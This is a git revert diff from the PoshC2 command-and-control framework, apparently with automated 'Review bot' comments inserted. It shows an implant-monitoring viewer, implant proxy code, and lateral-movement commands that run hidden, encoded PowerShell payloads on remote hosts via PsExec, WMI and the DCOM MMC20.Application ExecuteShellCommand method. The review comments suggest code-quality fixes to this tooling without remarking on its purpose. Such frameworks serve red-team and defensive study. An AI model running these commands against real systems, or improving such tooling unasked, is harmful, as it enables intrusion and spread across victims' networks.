Revert "Merge branch 'master' of https://github.com/nettitude/PoshC2_Python"
This reverts commit chunking 7231d9026d, reversing changes made to d352a8e6e7.
parent
7231d9026d
commit
9f8b17f6a6
22
C2Viewer.py
22
C2Viewer.py
|
@ -3,7 +3,6 @@
|
|||
from Colours import *
|
||||
from Config import *
|
||||
from DB import *
|
||||
from Help import *
|
||||
import time, os
|
||||
|
||||
rows = 10
|
||||
|
@ -17,10 +16,8 @@ try:
|
|||
except Exception as e:
|
||||
print "cls"
|
||||
print chr(27) + "[2J"
|
||||
|
||||
print (Colours.GREEN + "")
|
||||
print (logopic)
|
||||
print (Colours.END + "")
|
||||
print Colours.GREEN,""
|
||||
print logo, Colours.END
|
||||
|
||||
try:
|
||||
taskid = get_seqcount("CompletedTasks") + 1
|
||||
|
@ -40,7 +37,6 @@ except Exception as e:
|
|||
user = "None"
|
||||
implantid = 1
|
||||
|
||||
print newtaskid
|
||||
while(1):
|
||||
try:
|
||||
newtask = get_newtasksbyid(newtaskid)
|
||||
|
@ -56,10 +52,10 @@ while(1):
|
|||
print "Loading Shellcode",Colours.END
|
||||
elif "upload-file" in command.lower():
|
||||
print "Uploading File",Colours.END
|
||||
else:
|
||||
else:
|
||||
print command,Colours.END
|
||||
|
||||
newtaskid = newtaskid + 1
|
||||
newtaskid = newtaskid + 1
|
||||
except Exception as e:
|
||||
user = "None"
|
||||
|
||||
|
@ -69,9 +65,9 @@ while(1):
|
|||
now = datetime.datetime.now()
|
||||
if hostinfo:
|
||||
print Colours.GREEN
|
||||
print "Command returned against implant %s on host %s %s (%s)" % (hostinfo[0],hostinfo[3],hostinfo[11],now.strftime("%m/%d/%Y %H:%M:%S"))
|
||||
print "Command returned against implant %s on host %s %s (%s)" % (hostinfo[0],hostinfo[3],hostinfo[11],now.strftime("%m/%d/%Y %H:%M:%S"))
|
||||
print completedtask[4],Colours.END
|
||||
taskid = taskid + 1
|
||||
taskid = taskid + 1
|
||||
except Exception as e:
|
||||
user = "None"
|
||||
|
||||
|
@ -80,12 +76,12 @@ while(1):
|
|||
if implant:
|
||||
print Colours.GREEN
|
||||
print "New %s implant connected: (uri=%s key=%s) (%s)" % (implant[15], implant[1], implant[5], now.strftime("%m/%d/%Y %H:%M:%S"))
|
||||
print "%s | URL:%s | Time:%s | PID:%s | Sleep:%s | %s (%s) " % (implant[4], implant[9], implant[6],
|
||||
print "%s | URL:%s | Time:%s | PID:%s | Sleep:%s | %s (%s) " % (implant[4], implant[9], implant[6],
|
||||
implant[8], implant[13], implant[11], implant[10])
|
||||
print Colours.END
|
||||
implantid = implantid + 1
|
||||
implantid = implantid + 1
|
||||
except Exception as e:
|
||||
user = "None"
|
||||
|
||||
time.sleep(1)
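Review bot: Each `try` inside the `while(1)` polling loop ends in `except Exception as e: user = "None"` (visible in the hunks at -56,10, -69,9 and -80,12), which discards every error, so a failed database read or an unexpected row shape makes the viewer go quiet while it keeps polling once a second. If that handler is also the normal "no new row yet" path, which is how it reads from here, test the lookup result before indexing it, as the existing `if hostinfo:` and `if implant:` checks already do, and keep the handler for real failures. A line such as `print Colours.END + "viewer error: %s" % e` in the handler would then surface them. The loop body starts outside these hunks, so the handlers may be doing more than is shown.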
|
||||
|
||||
|
|
@ -67,8 +67,6 @@ public class Program
|
|||
proxy.UseDefaultCredentials = false;
|
||||
proxy.BypassProxyOnLocal = false;
|
||||
x.Proxy = proxy;
|
||||
} else {
|
||||
x.UseDefaultCredentials = true;
|
||||
}
|
||||
|
||||
var df = "#REPLACEDF#";
|
||||
|
|
|
@ -242,8 +242,6 @@ while(True):
|
|||
|
||||
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
|
||||
opener = urllib2.build_opener()
|
||||
if (len(cmd) > 200):
|
||||
cmd = cmd[0:200]
|
||||
postcookie = encrypt(key, cmd)
|
||||
data = base64.b64decode(random.choice(icoimage))
|
||||
dataimage = data.ljust( 1500, '\\0' )
|
||||
|
|
|
@ -317,7 +317,7 @@ def startup(printhelp = ""):
|
|||
for t in comtasks:
|
||||
hostname = get_implantdetails(t[2])
|
||||
if hostname[2] not in users:
|
||||
users += "%s @ %s\n" % (hostname[2],hostname[3])
|
||||
users += "%s \n" % hostname[2]
|
||||
if "Upload-File" in t[3]:
|
||||
uploadedfile = t[3]
|
||||
uploadedfile = uploadedfile.partition("estination ")[2]
|
||||
|
@ -350,7 +350,7 @@ def startup(printhelp = ""):
|
|||
else:
|
||||
for task in tasks:
|
||||
imname = get_implantdetails(task[1])
|
||||
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
|
||||
alltasks += "(%s) %s\r\n" % ("%s" % (imname[11]),task[2])
|
||||
startup("Queued tasks:\r\n\r\n%s" % alltasks)
|
||||
|
||||
if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
|
||||
|
@ -824,14 +824,18 @@ def runcommand(command, randomuri):
|
|||
|
||||
elif "invoke-psexecproxypayload" in command.lower():
|
||||
check_module_loaded("Invoke-PsExec.ps1", randomuri)
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||
C2 = get_c2server_all()
|
||||
if C2[11] == "":
|
||||
startup("Need to run createproxypayload first")
|
||||
else:
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
||||
C2[13], C2[11], "", "", C2[19], C2[20],
|
||||
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
||||
payload = newPayload.CreateRawBase()
|
||||
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
|
||||
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
|
||||
new_task(cmd, randomuri)
|
||||
else:
|
||||
startup("Need to run createproxypayload first")
|
||||
|
||||
elif "invoke-psexecdaisypayload" in command.lower():
|
||||
check_module_loaded("Invoke-PsExec.ps1", randomuri)
|
||||
|
@ -861,14 +865,18 @@ def runcommand(command, randomuri):
|
|||
|
||||
elif "invoke-wmiproxypayload" in command.lower():
|
||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||
C2 = get_c2server_all()
|
||||
if C2[11] == "":
|
||||
startup("Need to run createproxypayload first")
|
||||
else:
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
||||
C2[13], C2[11], "", "", C2[19], C2[20],
|
||||
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
||||
payload = newPayload.CreateRawBase()
|
||||
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
|
||||
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
|
||||
new_task(cmd, randomuri)
|
||||
else:
|
||||
startup("Need to run createproxypayload first")
|
||||
|
||||
elif "invoke-wmidaisypayload" in command.lower():
|
||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
|
||||
|
@ -897,16 +905,15 @@ def runcommand(command, randomuri):
|
|||
# dcom lateral movement
|
||||
|
||||
elif "invoke-dcomproxypayload" in command.lower():
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
p = re.compile(ur'(?<=-target.).*')
|
||||
target = re.search(p, command).group()
|
||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
|
||||
new_task(pscommand, randomuri)
|
||||
else:
|
||||
startup("Need to run createproxypayload first")
|
||||
C2 = get_c2server_all()
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
||||
C2[13], C2[11], "", "", C2[19], C2[20],
|
||||
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
||||
payload = newPayload.CreateRawBase()
|
||||
p = re.compile(ur'(?<=-target.).*')
|
||||
target = re.search(p, command).group()
|
||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
||||
new_task(pscommand, randomuri)
|
||||
|
||||
elif "invoke-dcomdaisypayload" in command.lower():
|
||||
daisyname = raw_input("Name required: ")
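Review bot: In the `startup()` hunk at -317,7, `if hostname[2] not in users:` looks like a substring test, since `users` is built with `+=` from formatted strings; a user name contained in one already listed (for example `adm` after `admin`) is dropped from the report. Track the names in a set instead: `seen = set()` before the loop, then `if hostname[2] not in seen:` followed by `seen.add(hostname[2])`. `startup()` begins and continues outside the hunk, so the initial value of `users` is not visible here.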
|
||||
|
|
4296
Modules/Inveigh.ps1
4296
Modules/Inveigh.ps1
File diff suppressed because it is too large